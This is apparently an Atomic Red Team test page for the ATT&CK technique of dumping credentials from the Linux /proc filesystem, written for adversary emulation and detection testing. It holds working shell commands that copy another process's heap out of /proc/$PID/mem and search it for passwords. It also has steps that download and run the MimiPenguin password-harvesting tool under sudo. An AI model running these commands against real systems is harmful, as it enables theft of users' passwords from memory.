Try it using Invoke-Atomic

OS Credential Dumping: Proc Filesystem

Description from ATT&CK

Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.

This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.

Atomic Tests

Atomic Test #1 - Dump individual process memory with sh (Local)

Using

1
/proc/$PID/mem
, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later.

Supported Platforms: linux

auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80

Inputs:

Name Description Type Default Value
output_file Path where captured results will be placed Path /tmp/T1003.007.bin
script_path Path to script generating the target process Path /tmp/T1003.007.sh
pid_term Unique string to use to identify target process String T1003.007

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
7
8
9
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"

Cleanup Commands:

1
2
rm -f "#{output_file}"

Dependencies: Run with sh!

Description: Script to launch target process must exist

Check Prereq Commands:

1
2
3
test -f #{script_path}
grep "#{pid_term}" #{script_path}

Get Prereq Commands:

1
2
3
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}

Atomic Test #2 - Dump individual process memory with Python (Local)

Using

1
/proc/$PID/mem
, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later.

Supported Platforms: linux

auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63

Inputs:

Name Description Type Default Value
output_file Path where captured results will be placed Path /tmp/T1003.007.bin
script_path Path to script generating the target process Path /tmp/T1003.007.sh
python_script Path to script generating the target process Path PathToAtomicsFolder/T1003.007/src/dump_heap.py
pid_term Unique string to use to identify target process String T1003.007

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"

Cleanup Commands:

1
2
rm -f "#{output_file}"

Dependencies: Run with sh!

Description: Script to launch target process must exist

Check Prereq Commands:

1
2
3
test -f #{script_path}
grep "#{pid_term}" #{script_path}

Get Prereq Commands:

1
2
3
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}

Description: Requires Python

Check Prereq Commands:

1
2
(which python || which python3 || which python2)

Get Prereq Commands:

1
2
echo "Python 2.7+ or 3.4+ must be installed"

Atomic Test #3 - Capture Passwords with MimiPenguin

MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.

Supported Platforms: linux

auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c

Inputs:

Name Description Type Default Value
output_file Path where captured results will be placed Path /tmp/T1003.007Test3.txt
MimiPenguin_Location Path of MimiPenguin script Path /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh

Attack Commands: Run with bash! Elevation Required (e.g. root or admin)

1
2
3
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}

Cleanup Commands:

1
2
rm -f #{output_file} > /dev/null

Dependencies: Run with sh!

Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})

Check Prereq Commands:

1
2
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin

Description: Strings must be installed

Check Prereq Commands:

1
2
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
sudo apt-get -y install binutils

Description: Python2 must be installed

Check Prereq Commands:

1
2
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
sudo apt-get -y install python2       

Description: Libc-bin must be installed

Check Prereq Commands:

1
2
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
sudo apt-get -y install libc-bin        

source